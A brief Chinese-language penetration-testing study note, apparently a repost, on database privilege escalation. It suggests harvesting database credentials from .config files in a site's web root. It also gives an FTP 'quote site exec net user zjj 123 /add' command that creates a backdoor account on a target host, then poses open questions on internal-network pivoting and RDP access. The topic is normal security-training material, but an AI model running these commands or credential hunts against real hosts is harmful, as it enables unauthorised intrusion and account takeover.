标签:网络安全 80 账号 主机 数据库 笔记 提权 节课 远程
数据库提权中如何获得数据库的管理员账号和密码?
可以在网站的根目录中找和数据库有关的配置文件.config,一般会有连接数据库的账号和密码。
远程利用目标主机文件执行权限执行命令:
攻击机在cmd命令行输入
ftp
open 192.168.18.11
目标主机密码
quote site exec net user zjj 123 /add
执行成功没有返回结果。
提权后如何渗透内网?
假设目标主机防火墙策略仅开放80端口,攻击者通过80端口在目标主机创建账号,但远程登录端口号是3389,如何实现远程登录?
标签:网络安全,80,账号,主机,数据库,笔记,提权,节课,远程 来源: https://www.cnblogs.com/123456ZJJ/p/12930049.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。